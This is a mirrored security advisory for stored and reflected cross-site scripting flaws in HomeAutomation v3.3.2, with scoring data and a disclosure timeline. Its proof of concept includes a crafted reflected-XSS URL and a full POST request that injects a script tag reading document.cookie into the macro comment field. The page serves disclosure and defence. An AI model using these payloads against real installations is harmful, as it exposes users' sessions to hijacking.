Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zeroscienceGjoko KrsticZSL-2019-5556
HistoryDec 29, 2019 - 12:00 a.m.

HomeAutomation v3.3.2 Stored and Reflected XSS

2019-12-2900:00:00
Gjoko Krstic
zeroscience.mk
46

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.3 Medium

AI Score

Confidence

High

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

45.9%

JSON

Title: HomeAutomation v3.3.2 Stored and Reflected XSS
Advisory ID: ZSL-2019-5556
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 29.12.2019

Summary

HomeAutomation is an open-source web interface and scheduling solution. It was initially made for use with the Telldus TellStick, but is now based on a plugin system and except for Tellstick it also comes with support for Crestron, OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers, etc.) based on an advanced scheduling system, taking into account things like measurements from various sensors. With the houseplan view you can get a simple overview of the status of your devices at their location in your house.

Description

HomeAutomation suffers from multiple stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

Vendor

Tom Rosenback and Daniel Malmgren - <http://karpero.mine.nu/ha/&gt;

Affected Version

3.3.2

Tested On

Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
Apache/2.4.29 (Ubuntu)
PHP/7.4.0RC4
PHP/7.3.11
PHP 7.2.24-0ubuntu0.18.04.1

Vendor Status

[06.11.2019] Vulnerability discovered.
[07.11.2019] Vendor contacted.
[29.11.2019] No response from the vendor.
[30.11.2019] Vendor contacted.
[28.12.2019] No response from the vendor.
[29.12.2019] Public security advisory released.

PoC

homeautomation_xss.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.exploit-db.com/exploits/47806&gt;
[2] <https://cxsecurity.com/issue/WLB-2019120130&gt;
[3] <https://packetstormsecurity.com/files/155786/&gt;
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/173655&gt;
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/173656&gt;
[6] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-21987&gt;
[7] <https://nvd.nist.gov/vuln/detail/CVE-2020-21987&gt;
[8] <https://www.tenable.com/cve/CVE-2020-21987&gt;

Changelog

[29.12.2019] - Initial release
[24.01.2020] - Added reference [1], [2], [3], [4] and [5]
[19.06.2021] - Added reference [6], [7] and [8]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>HomeAutomation v3.3.2 Stored and Reflected XSS


Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2

Summary: HomeAutomation is an open-source web interface and scheduling solution.
It was initially made for use with the Telldus TellStick, but is now based on a
plugin system and except for Tellstick it also comes with support for Crestron,
OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
etc.) based on an advanced scheduling system, taking into account things like
measurements from various sensors. With the houseplan view you can get a simple
overview of the status of your devices at their location in your house.

Desc: HomeAutomation suffers from multiple stored and reflected XSS vulnerabilities
when input passed via several parameters to several scripts is not properly sanitized
before being returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of an affected site.

Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
           Apache/2.4.29 (Ubuntu)
           PHP/7.4.0RC4
           PHP/7.3.11
           PHP 7.2.24-0ubuntu0.18.04.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5556
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php


06.11.2019

--


Reflected XSS:
--------------

https://192.168.2.113/?page=houseplan&amp;autologin=1&amp;msg=eyJpZCI6IiIsInRleHQiOiI8bWFycXVlZT50ZXN0PC9tYXJxdWVlPlVzZXJuYW1lIG9yIHBhc3N3b3JkIHdyb25nIiwiYWRkaXRpb25hbFRleHQiOiIiLCJ0eXBlIjoiZXJyb3IiLCJhdXRvQ2xvc2UiOmZhbHNlLCJzaG93T25seUluRGVidWciOmZhbHNlfQ==


Stored XSS:
-----------

POST /homeautomation_v3_3_2/?page=conf-macros HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 998
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryq4LcgA7mbqElCW4q
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: http://localhost/homeautomation_v3_3_2/?page=conf-macros&amp;action=edit&amp;id=-1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: HomeAutomation_user=admin; HomeAutomation_hash=842427e5fc831255d7aa811b70e64957; PHPSESSID=ldcipit064rfp5l8rtcah091og


------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="id"

-1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="action"

save
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="name"

XSS
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="comment"

"&gt;<script>confirm(document.cookie)</script>
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="icon_on"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="scenario"

1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="devices[0]"

1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="statuses[0]"

1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="save"

Save
------WebKitFormBoundaryq4LcgA7mbqElCW4q--



</p></body></html>

Related

cve 1
prion 1
cve
cve
CVE-2020-21987
2021-04-27 18:15:00
prion
prion
Cross site scripting
2021-04-27 18:15:00

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.3 Medium

AI Score

Confidence

High

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

45.9%

JSON
Related for ZSL-2019-5556
cve1prion1